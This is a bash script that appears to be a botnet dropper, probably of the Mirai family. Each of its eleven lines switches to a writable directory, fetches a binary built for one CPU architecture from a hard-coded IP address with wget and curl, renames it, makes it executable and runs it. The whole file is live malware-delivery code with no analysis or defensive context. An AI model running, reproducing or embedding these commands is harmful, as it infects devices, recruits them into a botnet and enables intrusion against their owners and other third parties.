#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.103.250/gaybub/miori.x86; curl -O http://80.211.103.250/gaybub/miori.x86;cat miori.x86 >gfre;chmod +x *;./gfre ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.103.250/gaybub/miori.mips; curl -O http://80.211.103.250/gaybub/miori.mips;cat miori.mips >gfre;chmod +x *;./gfre ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.103.250/gaybub/miori.mpsl; curl -O http://80.211.103.250/gaybub/miori.mpsl;cat miori.mpsl >gfre;chmod +x *;./gfre ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.103.250/gaybub/miori.arm4; curl -O http://80.211.103.250/gaybub/miori.arm4;cat miori.arm4 >gfre;chmod +x *;./gfre ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.103.250/gaybub/miori.arm5; curl -O http://80.211.103.250/gaybub/miori.arm5;cat miori.arm5 >gfre;chmod +x *;./gfre ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.103.250/gaybub/miori.arm6; curl -O http://80.211.103.250/gaybub/miori.arm6;cat miori.arm6 >gfre;chmod +x *;./gfre ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.103.250/gaybub/miori.arm7; curl -O http://80.211.103.250/gaybub/miori.arm7;cat miori.arm7 >gfre;chmod +x *;./gfre ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.103.250/gaybub/miori.ppc; curl -O http://80.211.103.250/gaybub/miori.ppc;cat miori.ppc >gfre;chmod +x *;./gfre ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.103.250/gaybub/miori.m68k; curl -O http://80.211.103.250/gaybub/miori.m68k;cat miori.m68k >gfre;chmod +x *;./gfre ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.103.250/gaybub/miori.sh4; curl -O http://80.211.103.250/gaybub/miori.sh4;cat miori.sh4 >gfre;chmod +x *;./gfre ssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.103.250/gaybub/miori.arc; curl -O http://80.211.103.250/gaybub/miori.arc;cat miori.arc >gfre;chmod +x *;./gfre ssh
